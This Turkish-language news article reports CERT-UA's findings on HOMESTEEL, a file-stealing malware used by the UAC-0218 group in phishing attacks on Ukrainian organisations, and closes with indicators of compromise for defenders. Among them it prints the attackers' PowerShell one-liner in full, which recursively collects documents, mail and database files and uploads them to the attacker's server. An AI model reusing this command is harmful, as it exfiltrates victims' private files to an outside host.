UAC-0218 olarak takip edilen tehdit aktörünün yakın zamanda gerçekleştirdiği bir siber saldırı, Ukrayna’nın kritik veri havuzlarını hedef alan HOMESTEEL adlı yeni bir kötü amaçlı yazılım çeşidini tanıttı. Ukrayna’nın Bilgisayar Acil Durum Müdahale Ekibi (CERT-UA) tarafından işaretlenen bu son saldırı, hükümetten ve iş ağlarından hassas bilgileri çalmayı amaçlayan Ukrayna’nın düşmanlarının çalışma tarzını yansıtıyor.
CERT-UA, alıcıları “hesap” ve “ayrıntılar” gibi tanıdık konu satırları aracılığıyla tuzağa düşüren ve görünüşte meşru bir “eDisk” platformuna bağlantı veren e-postaları içeren kimlik avı yöntemlerini belirledi.
eDisk bağlantısı, kullanıcıları kötü amaçlı içerik barındıran RAR dosyalarını indirmeye yönlendirir ve “Contract20102024.doc” ve “Invoice20102024.xlsx” olarak etiketlenen iki parola korumalı dosyayı içerir. Gizli bir Visual Basic Komut Dosyası (VBS) dosyası olan “Password.vbe”, sonuçta HOMESTEEL’in veri emme işlemlerini başlatır.
“xls”, “xlsx”, “doc” ve “pdf” ile bitenler gibi birincil hedef dosyalar, kullanıcı dizinlerinden beş alt klasör derinliğine kadar sistematik olarak toplanır. HOMESTEEL’in kodu, 10 MB’ın altındaki dosyaları bir HTTP PUT isteği aracılığıyla harici bir sunucuya ileterek yinelemeli bir arama komutu verir. Bu yaklaşım, veri toplamayı en üst düzeye çıkarırken potansiyel tespitten kaçınmak için veri boyutunu en aza indirir.
HOMESTEEL’in Proxy Kullanımı Saldırı Karmaşıklığını Artırıyor
UAC-0218’in teknikleri çevreye özellikle iyi uyarlanmış görünüyor. HOMESTEEL, güvenliği ihlal edilmiş sistemlerdeki proxy ayarlarına uyum sağlayarak ağ trafiğini daha da kamufle edebilir.
CERT-UA, saldırganın sunucusuna giden her isteğin, çıkarılan dosyanın tam yolunu içerdiğini ve bunun, saldırganların güvenliği ihlal edilmiş sistemlerde hassas dosyaları kataloglamasına yardımcı olabileceğini bildirdi. Bu düzeydeki özelleştirme, genellikle daha karmaşık ve kalıcı saldırılarda görülen bir gözetim istihbaratı düzeyine işaret ediyor.
HOMESTEEL kötü amaçlı yazılımının dikkate değer bir yönü, siber operasyonlarda yaygın olarak kullanılan Windows ortamlarındaki bir komut satırı kabuğu olan PowerShell’e güvenmesidir.
CERT-UA araştırmacıları, yerleşik PowerShell komutlarına sahip, kendi kendine açılan bir arşiv görevi gören ek bir yürütülebilir dosya buldu. Bu komutlar daha fazla dosya keşfi başlatır, kullanıcı dizinlerini xls*, doc*, pdf ve eml gibi uzantılar için tarar ve dosyaları HTTP POST istekleri yoluyla merkezi bir sunucuya gönderir.
Bu çift metodoloji, ilk enfeksiyon vektörünün karşılaştığı her türlü güvenlik engelini aşmaya çalışırken HOMESTEEL’in dayanıklılığını sergiliyor.
Altyapı Taktikleri Kampanyayı Ağustos Kökenlerine Bağladı
CERT-UA bulguları, komuta altyapısının alan adı kayıt verilerine dayanarak UAC-0218’in faaliyetlerini Ağustos 2024’e kadar ilişkilendiriyor. Ukraynalı siber savunucular Çarşamba günü, Ağustos ayında benzer bir niyetle başlayan başka bir kampanyayı ortaya çıkardı ancak bu durumda tehdit aktörünün UAC-0215 olarak takip edilmesi nedeniyle ikisi arasında hiçbir bağlantı kurulamadı.
Saldırganlar, bir alan adı kayıt şirketi olan HostZealot’tan yararlandı ve merkezi veri alma platformu olarak özel bir Python tabanlı web sunucusu yapılandırdı. Sunucu, kendine özgü bir “Python Software Foundation BaseHTTP 0.6” başlığını ortaya çıkarıyor ve analistlerin bu kampanyayı önceki UAC-0218 saldırılarında kullanılan altyapıyla aynı şekilde ilişkilendirmesine yardımcı oluyor.
UAC-0218, bileşenleri birden fazla operasyonda yeniden kullanarak, verimliliği artırmak ve genel giderleri azaltmak için mevcut dijital varlıklardan yararlanan kalıcı bir strateji sergiliyor.
HOMESTEEL kampanyası, uzun süredir siber saldırılarla mücadele eden Ukrayna hükümeti için acil endişelere yol açıyor. Ukrayna’ya karşı siber casusluk kampanyaları gelişmeye devam ederken, CERT-UA’nın UAC-0218’i proaktif olarak izlemesi, gelişen kötü amaçlı yazılım taktiklerinden ve gelişmiş kimlik avı metodolojilerinden yararlanan tehditlere ilişkin kritik bir farkındalığa işaret ediyor.
CERT-UA tarafından paylaşılan Uzlaşma Göstergeleri
Dosya Karmaları:
10d486a514212bff2ef181010e8bd421 3432fe8487b72860cf60b54169f071e26336c56ff078ff78a13e8e29a02b4424 _№_601.rar dc7e9ab6374bccf3225d95ed4595a608 1679e968b0672342091b2bef5c379767bc59bf575f7ed8d9c6abbdc10fcafe01 Account20102024.xlsx 16e2255474930bab59d59a62caf35a5b 7dd938f2b0d809a80e9e3bf80f9c9d5b27145962871fdc19772ecda95b948abb Agreement 20102024.doc 7c95cd4b9471c904db3a5afc9179b3bc c95fcee5b3daace259c4f31f699c4fca82da7ebc8ed950caa630ca763b2b3e15 Password.vbe cd03aa7bc1b1f2b64f0c6856ba312484 f541d5c6338d65afba2245685ac1189b44c90393d7e67b70289e1f28b6da6c52 WEXTRACT.EXE d7a120fee99b0655a08f330a4542f141 465c8bbf75a1717546450cf88aa53d4e12345ab2c776b99dbef1c147da34966a install.txt 325a5308c225ed14355d5afcd12a059c 4ba64f21fb69f2b10debdcf9f8424d0090c98d4dfb3d0d0f9faac0458ba9ae00 POSTRUNPROGRAM 62febd43f2253710adaeea3a0639d26d b8e6665682f4a0a70dcbd4134441041f290fc8b357503ab122fc09911a8a9629 RUNPROGRAM
Ağ:
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 1712-327.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 3881-251.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 612-118.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 692-251.rar hXXps://edisk.in[.]ua/571df09c9c45758/account No. 1712-327.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/ №_601.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/Invoice No. 6492-115.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/2024-10-10_001.rar hXXps://staticgl[.]one/ hXXps://winupmirror[.]support/ edisk.ukrnet.01mirror.com[.]ua ukrnet.01mirror.com[.]ua 01mirror.com.ua 2024-10-10 ukrnames.com swiftydns.com edisk.in.ua 2024-10-23 ukrnames.com swiftydns.com winupmirror.support 2024-10-09 namecheap.com swiftydns.com staticgl.one 2024-08-23 namecheap.com registrar-servers.com 109[.]205.195.233 (C2) 194[.]107.92.234 (X-Originating-IP) 46[.]149.173.221 (X-Originating-IP) 94[.]140.114.32 94[.]140.114.76
Sunucular:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
powershell.exe "(New-Object -ComObject Wscript.Shell).Popup('Error! OS Not Supported!')"
powershell.exe "[Net.ServicePointManager]::SecurityProtocol="Tls12";foreach($fil in dir $HOME -include('*.xls*','*doc*','*.pdf','*. eml','*.sqlite','*.pst','*.txt') -recurse | %{$_.FullName}){iwr https://staticgl.one/$fil -Method POST -infile $ file}"
İlgili